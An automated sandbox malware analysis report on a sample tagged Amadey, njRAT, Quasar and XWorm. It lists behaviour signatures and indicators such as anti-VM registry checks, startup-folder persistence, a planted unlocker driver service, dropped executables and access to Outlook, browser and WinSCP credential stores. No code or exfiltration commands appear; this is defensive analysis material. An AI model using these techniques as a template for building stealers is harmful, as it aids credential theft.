Malware Analysis Report

2025-08-10 19:57

Sample ID 250630-vr6p2aaq2t
Target 74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.bin
SHA256 74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4
Tags
amadey njrat quasar xworm 30b25e google chrome hacked bootkit collection credential_access cryptone defense_evasion discovery execution packer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4

Threat Level: Known bad

The file 74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.bin was found to be: Known bad.

Malicious Activity Summary

amadey njrat quasar xworm 30b25e google chrome hacked bootkit collection credential_access cryptone defense_evasion discovery execution packer persistence rat spyware stealer trojan

Quasar payload

njRAT/Bladabindi

Amadey family

Xworm

Amadey

Detect Xworm Payload

Njrat family

Xworm family

Quasar family

Quasar RAT

CryptOne packer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets service image path in registry

Stops running service(s)

Uses browser remote debugging

Downloads MZ/PE file

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Executes dropped EXE

Reads WinSCP keys stored on the system

Drops startup file

Loads dropped DLL

Identifies Wine through registry keys

Checks computer location settings

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Obfuscated Files or Information: Command Obfuscation

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Command and Scripting Interpreter: PowerShell

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Launches sc.exe

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

outlook_office_path

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious behavior: LoadsDriver

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Delays execution with timeout.exe

Enumerates system info in registry

Modifies registry class

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies registry key

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-06-30 17:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-06-30 17:14

Reported

2025-06-30 17:16

Platform

win10v2004-20250610-en

Max time kernel

109s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A

Stops running service(s)

defense_evasion execution

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\74ab73fc76f764527ece4358fca9df921acb78d67ec7062ad549036e902ac0f4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Temper\pzoljWug.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Temper\dHzrrTgp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DQ39O.tmp\O1sOUoo.tmp N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPJNTN.exe.lnk C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YKIEPH.exe.lnk C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKEYSH.exe.lnk C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPJNTN.exe.lnk C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EQNSWE.exe.lnk C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YKIEPH.exe.lnk C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\pTLQnagR.exe N/A
N/A N/A C:\Temper\pzoljWug.exe N/A
N/A N/A C:\Temper\dHzrrTgp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FKI5Q.tmp\O1sOUoo.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10524990101\tktVLbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
